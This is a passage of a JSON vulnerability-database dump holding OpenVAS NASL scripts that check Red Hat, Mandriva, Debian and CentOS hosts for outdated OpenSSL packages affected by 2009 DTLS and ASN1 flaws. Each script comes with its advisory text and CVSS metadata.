DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.\";\n\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64799\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-09 02:15:49 +0200 (Wed, 09 Sep 2009)\");\n script_cve_id(\"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1335\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1335.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~12.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~0.9.8e~12.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~12.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~12.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:06", "references": [], "pluginID": "66370", "description": "The remote host is missing an update to openssl\nannounced via advisory MDVSA-2009:310.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Mandriva Security Advisory MDVSA-2009:310 (openssl)", "type": "openvas", "naslFamily": "Mandrake Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66370", "id": "OPENVAS:66370", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_310.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:310 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThe updated packages have been patched to prevent this.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:310\nhttp://marc.info/?l=openssl-cvs&m=124508133203041&w=2\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory MDVSA-2009:310.\";\n\n \n\nif(description)\n{\n script_id(66370);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\", \"CVE-2009-2409\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:310 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libopenssl0.9.8\", rpm:\"libopenssl0.9.8~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0.9.8-devel\", rpm:\"libopenssl0.9.8-devel~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0.9.8-static-devel\", rpm:\"libopenssl0.9.8-static-devel~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64openssl0.9.8\", rpm:\"lib64openssl0.9.8~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64openssl0.9.8-devel\", rpm:\"lib64openssl0.9.8-devel~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64openssl0.9.8-static-devel\", rpm:\"lib64openssl0.9.8-static-devel~0.9.8e~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:36", "references": [], "pluginID": "64920", "description": "The remote host is missing an update to openssl, openssl097\nannounced via advisory DSA 1888-1.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-21T00:00:00", "title": "Debian Security Advisory DSA 1888-1 (openssl, openssl097)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64920", "id": "OPENVAS:64920", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1888_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1888-1 (openssl, openssl097)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Certificates with MD2 hash signatures are no longer accepted by OpenSSL,\nsince they're no longer considered cryptographically secure.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.8g-15+lenny5.\n\nFor the old stable distribution (etch), this problem has been fixed in\nversion 0.9.8c-4etch9 for openssl and version 0.9.7k-3.1etch5 for\nopenssl097.\nThe OpenSSL 0.9.8 update for oldstable (etch) also provides updated\npackages for multiple denial of service vulnerabilities in the\nDatagram Transport Layer Security implementation. These fixes were\nalready provided for Debian stable (Lenny) in a previous point\nupdate. The OpenSSL 0.9.7 package from oldstable (Etch) is not\naffected. (CVE-2009-1377, CVE-2009-1378, CVE-2009-1379,\nCVE-2009-1386 and CVE-2009-1387)\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.9.8k-5.\n\nWe recommend that you upgrade your openssl packages.\";\ntag_summary = \"The remote host is missing an update to openssl, openssl097\nannounced via advisory DSA 1888-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201888-1\";\n\n\nif(description)\n{\n script_id(64920);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-2409\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1888-1 (openssl, openssl097)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8c-4etch9\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7\", ver:\"0.9.7k-3.1etch5\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8c-4etch9\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7-dbg\", ver:\"0.9.7k-3.1etch5\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8c-4etch9\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8c-4etch9\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8g-15+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-15+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8g-15+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8g-15+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:48", "references": [], "pluginID": "136141256231064935", "description": "The remote host is missing updates to openssl announced in\nadvisory CESA-2009:1335.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-21T00:00:00", "title": "CentOS Security Advisory CESA-2009:1335 (openssl)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064935", "id": "OPENVAS:136141256231064935", "sourceData": "#CESA-2009:1335 64935 2\n# $Id: ovcesa2009_1335.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1335 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1335\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1335\";\ntag_summary = \"The remote host is missing updates to openssl announced in\nadvisory CESA-2009:1335.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64935\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1335 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:02:34", "references": ["2009:1335", "http://lists.centos.org/pipermail/centos-announce/2009-September/016149.html"], "pluginID": "1361412562310880738", "description": "Check for the Version of openssl", "edition": 4, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-08-09T00:00:00", "title": "CentOS Update for openssl CESA-2009:1335 centos5 i386", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310880738", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880738", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2009:1335 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a full-strength\n general purpose cryptography library. Datagram TLS (DTLS) is a protocol\n based on TLS that is capable of securing datagram transport (for example,\n UDP).\n\n Multiple denial of service flaws were discovered in OpenSSL's DTLS\n implementation. A remote attacker could use these flaws to cause a DTLS\n server to use excessive amounts of memory, or crash on an invalid memory\n access or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\n CVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n \n Note: These flaws only affect applications that use DTLS. Red Hat does not\n ship any DTLS client or server applications in Red Hat Enterprise Linux.\n \n An input validation flaw was found in the handling of the BMPString and\n UniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\n function. An attacker could use this flaw to create a specially-crafted\n X.509 certificate that could cause applications using the affected function\n to crash when printing certificate contents. (CVE-2009-0590)\n \n Note: The affected function is rarely used. No application shipped with Red\n Hat Enterprise Linux calls this function, for example.\n \n These updated packages also fix the following bugs:\n \n * &quot;openssl smime -verify -in&quot; verifies the signature of the input file and\n the &quot;-verify&quot; switch expects a signed or encrypted input file. Previously,\n running openssl on an S/MIME file that was not encrypted or signed caused\n openssl to segfault. With this update, the input file is now checked for a\n signature or encryption. Consequently, openssl now returns an error and\n quits when attempting to verify an unencrypted or unsigned S/MIME file.\n (BZ#472440)\n \n * when generating RSA keys, pairwise tests were called even in non-FIPS\n mode. This prevented small keys from being generated. With this update,\n generating keys in non-FIPS mode no longer calls the pairwise tests and\n keys as small as 32-bits can be generated in this mode. Note: In FIPS mode,\n pairwise tests are still called and keys generated in this mode must still\n be 1024-bits or larger. (BZ#479817)\n \n As well, these updated packages add the following enhancements:\n \n * both the libcrypto and libssl shared libraries, which are part of the\n OpenSSL FIPS module, are now checked for integrity on initialization of\n FIPS mode. (BZ#475798)\n \n * an issuing Certificate Authority (CA) allows multiple certificate\n templates to inherit the CA's Common Name (CN). Be ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"openssl on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-September/016149.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880738\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2009:1335\");\n script_cve_id(\"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\",\n \"CVE-2009-1386\", \"CVE-2009-1387\");\n script_name(\"CentOS Update for openssl CESA-2009:1335 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~12.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:46", "references": [], "pluginID": "136141256231064920", "description": "The remote host is missing an update to openssl, openssl097\nannounced via advisory DSA 1888-1.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-21T00:00:00", "title": "Debian Security Advisory DSA 1888-1 (openssl, openssl097)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064920", "id": "OPENVAS:136141256231064920", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1888_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1888-1 (openssl, openssl097)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Certificates with MD2 hash signatures are no longer accepted by OpenSSL,\nsince they're no longer considered cryptographically secure.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.8g-15+lenny5.\n\nFor the old stable distribution (etch), this problem has been fixed in\nversion 0.9.8c-4etch9 for openssl and version 0.9.7k-3.1etch5 for\nopenssl097.\nThe OpenSSL 0.9.8 update for oldstable (etch) also provides updated\npackages for multiple denial of service vulnerabilities in the\nDatagram Transport Layer Security implementation. These fixes were\nalready provided for Debian stable (Lenny) in a previous point\nupdate. The OpenSSL 0.9.7 package from oldstable (Etch) is not\naffected. (CVE-2009-1377, CVE-2009-1378, CVE-2009-1379,\nCVE-2009-1386 and CVE-2009-1387)\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.9.8k-5.\n\nWe recommend that you upgrade your openssl packages.\";\ntag_summary = \"The remote host is missing an update to openssl, openssl097\nannounced via advisory DSA 1888-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201888-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64920\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-2409\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1386\", \"CVE-2009-1387\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1888-1 (openssl, openssl097)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8c-4etch9\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7\", ver:\"0.9.7k-3.1etch5\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8c-4etch9\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 